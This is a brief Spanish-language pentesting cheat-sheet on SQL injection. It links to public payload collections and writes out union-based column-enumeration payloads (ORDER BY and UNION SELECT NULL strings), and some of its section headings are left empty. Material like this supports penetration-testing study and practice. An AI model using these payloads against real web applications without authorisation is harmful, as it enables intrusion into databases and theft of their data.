SQL injection (SQLi)

Identificación SQLi

• https://github.com/MrW0l05zyn/pentesting/blob/master/web/payloads/sql-injection/common-sqli-payloads.txt

Authentication bypass

• https://github.com/MrW0l05zyn/pentesting/blob/master/sql-injection/sql-injection-authentication-bypass.txt

Union-based SQLi

Determinar el número de columnas

ORDER BY 1-- -
ORDER BY 2-- -
ORDER BY 3-- -

UNION SELECT NULL-- -
UNION SELECT NULL,NULL-- -
UNION SELECT NULL,NULL,NULL-- -

Determinar el tipo de dato de cada columna

Obtener información

Payloads

FuzzDB

• https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/detect

Payload Box

• https://github.com/payloadbox/sql-injection-payload-list

Payloads All The Things

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection